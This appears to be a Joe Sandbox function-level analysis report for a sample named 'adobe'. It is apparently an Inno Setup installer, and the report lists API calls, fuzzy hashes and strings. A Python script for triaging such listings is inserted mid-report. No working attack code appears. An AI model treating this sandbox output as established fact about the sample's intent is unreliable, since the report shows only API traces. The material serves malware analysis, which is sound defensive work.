• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Menu
• String ID:
• API String ID: 3711407533-0
• Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
• Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
• Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
• Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(?,?,?,?), ref: 00416B94
• SetTextColor.GDI32(?,00000000), ref: 00416BAE
• SetBkColor.GDI32(?,00000000), ref: 00416BC8
• CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Color$CallMessageProcSendTextWindow
• String ID:
• API String ID: 601730667-0
• Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
• Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
• Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
• Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForInputIdle.USER32(00000001,00000032), ref: 004544D4
• MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004544F6
• GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454505
• CloseHandle.KERNEL32(00000001,00454532,0045452B,?,00000031,00000080,00000000,?,?,0045488B,00000080,0000003C,00000000,004548A1), ref: 00454525
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
• String ID:
• API String ID: 4071923889-0
• Opcode ID: c260732f7bc6e66c93fc0747e95a28efc76e926114616c5ed118186cab325e54
• Instruction ID: 349487cf624deee767c852797b2fe0003e47ef85cfa7f40603711d6a768e5e19
• Opcode Fuzzy Hash: c260732f7bc6e66c93fc0747e95a28efc76e926114616c5ed118186cab325e54
• Instruction Fuzzy Hash: 15012D706406087FEB209B968C06F6B7BACDF49774F510167FA04DB2C2D5788E40CA69
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                                                                          • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A24620A480A570EnumFonts
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2630238358-0
                                                                                                                                                          • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                                                                          • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                                                                                          • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                                                                          • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0044FF9C: SetEndOfFile.KERNEL32(?,?,0045BB62,00000000,0045BCED,?,00000000,00000002,00000002), ref: 0044FFA3
                                                                                                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045BCB9
                                                                                                                                                          Strings
                                                                                                                                                          • NumRecs range exceeded, xrefs: 0045BBB6
                                                                                                                                                          • EndOffset range exceeded, xrefs: 0045BBED
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$BuffersFlush
                                                                                                                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                                                          • API String ID: 3593489403-659731555
                                                                                                                                                          • Opcode ID: 39afe94f56613c7813e9b77cb58b190e76c7d606926c66b3316f4738456ce0e9
                                                                                                                                                          • Instruction ID: 6d3af99510feac489041cfa654adec88581dc8f1b33a8ec1f5b56db9886abadc
                                                                                                                                                          • Opcode Fuzzy Hash: 39afe94f56613c7813e9b77cb58b190e76c7d606926c66b3316f4738456ce0e9
                                                                                                                                                          • Instruction Fuzzy Hash: 3F61B834A002988FDB25DF15C891AD9B3B5EF49305F0084EAED899B752D7B4AEC8CF54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049727E), ref: 0040334B
                                                                                                                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049727E), ref: 00403356
                                                                                                                                                            • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497288), ref: 0040633A
                                                                                                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                                                                            • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497288), ref: 0040637E
                                                                                                                                                            • Part of subcall function 00409B88: 6F571CD0.COMCTL32(00497292), ref: 00409B88
                                                                                                                                                            • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                                                                                            • Part of subcall function 00419050: GetVersion.KERNEL32(004972A6), ref: 00419050
                                                                                                                                                            • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004972BA), ref: 0044EFD3
                                                                                                                                                            • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                                                                                            • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004972BF), ref: 0044F44F
                                                                                                                                                            • Part of subcall function 00452860: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 00452880
                                                                                                                                                            • Part of subcall function 00452860: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452886
                                                                                                                                                            • Part of subcall function 00452860: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 0045289A
                                                                                                                                                            • Part of subcall function 00452860: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004528A0
                                                                                                                                                            • Part of subcall function 004563AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004563D0
                                                                                                                                                            • Part of subcall function 00463E1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004972DD), ref: 00463E2B
                                                                                                                                                            • Part of subcall function 00463E1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463E31
                                                                                                                                                            • Part of subcall function 0046BF68: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BF7D
                                                                                                                                                            • Part of subcall function 0047783C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004972E7), ref: 00477842
                                                                                                                                                            • Part of subcall function 0047783C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047784F
                                                                                                                                                            • Part of subcall function 0047783C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047785F
                                                                                                                                                            • Part of subcall function 00494218: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00494231
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000000,0049732F), ref: 00497301
                                                                                                                                                            • Part of subcall function 00497030: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0049730B,00000001,00000000,0049732F), ref: 0049703A
                                                                                                                                                            • Part of subcall function 00497030: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497040
                                                                                                                                                            • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                          • ShowWindow.USER32(?,00000005,00000000,0049732F), ref: 00497362
                                                                                                                                                            • Part of subcall function 00480D60: SetActiveWindow.USER32(?), ref: 00480E0E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF571FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                                                          • String ID: Setup
                                                                                                                                                          • API String ID: 3527831634-3839654196
                                                                                                                                                          • Opcode ID: 4be8d2f2216c3d86f53edc2131360f76f4db51df2a18a4688cb56bf2564e711e
                                                                                                                                                          • Instruction ID: 484f7198321d14ea4dea1c0131909a4d2337dd7c7bc9f77692fbd9f4dc694a4d
                                                                                                                                                          • Opcode Fuzzy Hash: 4be8d2f2216c3d86f53edc2131360f76f4db51df2a18a4688cb56bf2564e711e
                                                                                                                                                          • Instruction Fuzzy Hash: A731A2312182009ED6117BB7AC13A1D3A98EB8971CB92447FF80496563DE3D58109A6F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
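The function record above is the one worth reading closely: nearly every entry is a GetModuleHandleA/LoadLibraryA followed by GetProcAddress, and the export names (SetDllDirectoryW, SetSearchPathMode, SetProcessDEPPolicy, Wow64DisableWow64FsRedirection, VerifyVersionInfoW) are the ones an analyst wants pulled out of a listing this long. The following Python is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses listing lines in the exact shape printed above (including "Part of subcall function" entries, entries with no argument list, and imports the sandbox could only show by address such as 73A1A570.USER32) and summarises which exports are resolved at run time. The sample lines in SAMPLE_LISTING are copied from the listing above; the heuristic that discards a stale module name such as "user32.dll" in the second GetProcAddress argument (the sandbox reconstructs arguments from the stack, so that slot is not always the export name) is this example's own assumption.

```python
"""Parse Joe Sandbox 'APIs' listing lines into records and summarise which exports
the sample resolves at run time via GetProcAddress.

Added example, not part of the Joe Sandbox report. SAMPLE_LISTING is copied from the
listing above; the export-name heuristic in looks_like_export() is an assumption.
"""
import re
from collections import Counter

# One line of the 'APIs' list. Shapes handled:
#   • SetErrorMode.KERNEL32(00000001,00000000,0049732F), ref: 00497301
#     • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
#     • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2   (no argument list)
#   • 73A1A570.USER32(00000000,?,?), ref: 0042312E   (import shown only by its address)
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed sample: lines copied from the function record above.
SAMPLE_LISTING = """\
  • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497288), ref: 0040633A
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
  • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497288), ref: 0040637E
  • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
  • Part of subcall function 00452860: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452886
  • Part of subcall function 0047783C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047785F
• SetErrorMode.KERNEL32(00000001,00000000,0049732F), ref: 00497301
• ShowWindow.USER32(?,00000005,00000000,0049732F), ref: 00497362
• 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
"""


def parse_api_line(line):
    """Return a record dict for one listing line, or None if the line is not an API entry."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw_args = m.group("args")
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    return {
        "api": m.group("api"),
        "module": m.group("mod").upper(),
        "args": args,
        "ref": m.group("ref").upper(),
        "subcall": (m.group("sub") or "").upper() or None,
        # An 8-hex-digit 'name' means the sandbox could not resolve the import
        # symbolically and printed the call target address instead.
        "unresolved": bool(HEX8.match(m.group("api"))),
    }


def parse_api_listing(text):
    """Parse every API line in a block of listing text; non-API lines are skipped."""
    return [r for r in (parse_api_line(line) for line in text.splitlines()) if r]


def looks_like_export(arg):
    """Assumption: the sandbox rebuilds arguments from the stack, so the second
    GetProcAddress argument is sometimes a leftover module name ('user32.dll'),
    a placeholder ('?') or a raw value rather than the export name. Keep only
    arguments that plausibly are export names."""
    return bool(arg) and arg != "?" and not HEX8.match(arg) and not arg.lower().endswith(".dll")


def resolved_exports(records):
    """Sorted, de-duplicated export names the sample looks up with GetProcAddress."""
    names = set()
    for r in records:
        if r["api"] == "GetProcAddress" and len(r["args"]) >= 2 and looks_like_export(r["args"][1]):
            names.add(r["args"][1])
    return sorted(names)


def unresolved_calls(records):
    """(address, module) pairs for imports the sandbox showed only by address."""
    return [(r["api"], r["module"]) for r in records if r["unresolved"]]


def triage(text):
    """Summary an analyst can scan instead of reading the whole listing."""
    recs = parse_api_listing(text)
    return {
        "calls": len(recs),
        "modules": Counter(r["module"] for r in recs),
        "dynamic_exports": resolved_exports(recs),
        "unresolved": unresolved_calls(recs),
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_LISTING)
    for key, value in summary.items():
        print(f"{key}: {value}")
```

Run against the listing above, the summary names SetDllDirectoryW, SetSearchPathMode, SetProcessDEPPolicy and VerifyVersionInfoW as run-time resolved exports and flags 73A1A570.USER32 as an import the sandbox could not name; feeding it the full report text instead of SAMPLE_LISTING works the same way, since lines that are not API entries are ignored.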

                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                                                                          • 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A25940CurrentThread
                                                                                                                                                          • String ID: R{E
                                                                                                                                                          • API String ID: 2655091166-1510225646
                                                                                                                                                          • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                                                                                          • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                                                                                                          • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                                                                                          • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B52A,00000000,0047B540,?,?,?,?,00000000), ref: 0047B306
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                           • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                                                          • API String ID: 3535843008-1113070880
                                                                                                                                                          • Opcode ID: 344431a7a897ba489bc81da4f0ae8848203ff68be56032f65477df9790645a67
                                                                                                                                                          • Instruction ID: 04360fd0e76bd9885b09d18b1896d3c06c7e8dc90750632679e29014fc616a1a
                                                                                                                                                          • Opcode Fuzzy Hash: 344431a7a897ba489bc81da4f0ae8848203ff68be56032f65477df9790645a67
                                                                                                                                                          • Instruction Fuzzy Hash: 18F0BB707041489BDB04D665BD9679F335DD742304F60807BE9059F352DBB89E41C79C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,;QG,?,0049B178,?,0046E2D3,?,00000000,0046E840,?,_is1), ref: 0046DFDF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID: ;QG$Inno Setup: Setup Version
                                                                                                                                                          • API String ID: 3702945584-3817970878
                                                                                                                                                          • Opcode ID: 356762e7fd68e90c015ef2c04776612547d7a1a591e261247c21e3013bed61cd
                                                                                                                                                          • Instruction ID: f3050d33c5814ab6aa431b6cc648485a2c40fd7aee5bec7ab5b075e1bccb7de3
                                                                                                                                                          • Opcode Fuzzy Hash: 356762e7fd68e90c015ef2c04776612547d7a1a591e261247c21e3013bed61cd
                                                                                                                                                          • Instruction Fuzzy Hash: 62E06D717016043FD710AA6B9C85F5BBADCDF98365F10403AB908DB392DA78DD0081A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474573), ref: 00474361
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474573), ref: 00474378
                                                                                                                                                            • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                          • String ID: CreateFile
                                                                                                                                                          • API String ID: 2528220319-823142352
                                                                                                                                                          • Opcode ID: cd42257a27c49996d210445f433f04bc23901129519cbf83be0bd647b84f5f4d
                                                                                                                                                          • Instruction ID: f02aa6a343f6253f7681c42d3745bad7d3df1daa7690a22d1e3a4974fa48f9f3
                                                                                                                                                          • Opcode Fuzzy Hash: cd42257a27c49996d210445f433f04bc23901129519cbf83be0bd647b84f5f4d
                                                                                                                                                          • Instruction Fuzzy Hash: 4FE06D343803447FEA10EA69CCC6F5A77889B04728F108152BA48AF3E2C6B9FC408618
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Open
                                                                                                                                                          • String ID: System\CurrentControlSet\Control\Windows$[!H
                                                                                                                                                          • API String ID: 71445658-1940484145
                                                                                                                                                          • Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                                                                                          • Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
                                                                                                                                                          • Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
